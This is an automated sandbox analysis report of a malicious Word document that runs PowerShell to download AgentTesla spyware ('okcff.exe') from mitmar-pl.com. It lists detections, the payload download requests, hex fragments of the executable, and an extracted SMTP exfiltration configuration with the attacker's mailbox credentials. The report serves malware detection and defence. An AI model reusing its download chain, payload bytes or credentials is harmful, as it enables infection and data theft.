Source: Yara match	File source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.0.9.166	mitmar-pl.com	Netherlands		198301	WKD-ASIE	true

Contacted Domains

Name	IP	Active
mitmar-pl.com	37.0.9.166	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mitmar-pl.com/okcff.exe	false		unknown
http://mitmar-pl.com/Crkrqdrd.jpeg	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 41.0.okcff.exe.400000.5.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}

Multi AV Scanner detection for submitted file

Source: 478644.doc	Virustotal: Detection: 41%			Perma Link
Source: 478644.doc	ReversingLabs: Detection: 30%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\okcff.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 41.0.okcff.exe.400000.5.unpack	Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.7.unpack	Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.9.unpack	Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.13.unpack	Avira: Label: TR/Spy.Gen8
Source: 41.0.okcff.exe.400000.11.unpack	Avira: Label: TR/Spy.Gen8

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source:	Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: okcff[1].exe.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe			Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: mitmar-pl.com

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_021AC348
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_021AC43D
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh	9_2_021AC915
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh	9_2_021AC920

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 37.0.9.166:80

Networking:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WKD-ASIE WKD-ASIE

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 37.0.9.166 37.0.9.166

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:18 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:22 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:23 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://mitmar-pl.com/ok
Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://mitmar-pl.com/okcff.ex
Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://mitmar-pl.com/okcff.exe
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp	String found in binary or memory: httP://mitmar-pl.com/okcff.exePE
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: http://mitmar-pl.com
Source: okcff.exe	String found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpeg
Source: okcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmp	String found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpegi
Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.444532419.000000001B5C6000.00000004.00000001.sdmp	String found in binary or memory: http://mitmar-pl.com/okcff.exe
Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/cclean
Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: okcff.exe	String found in binary or memory: https://google.com
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: https://google.com/
Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: https://google.comD
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
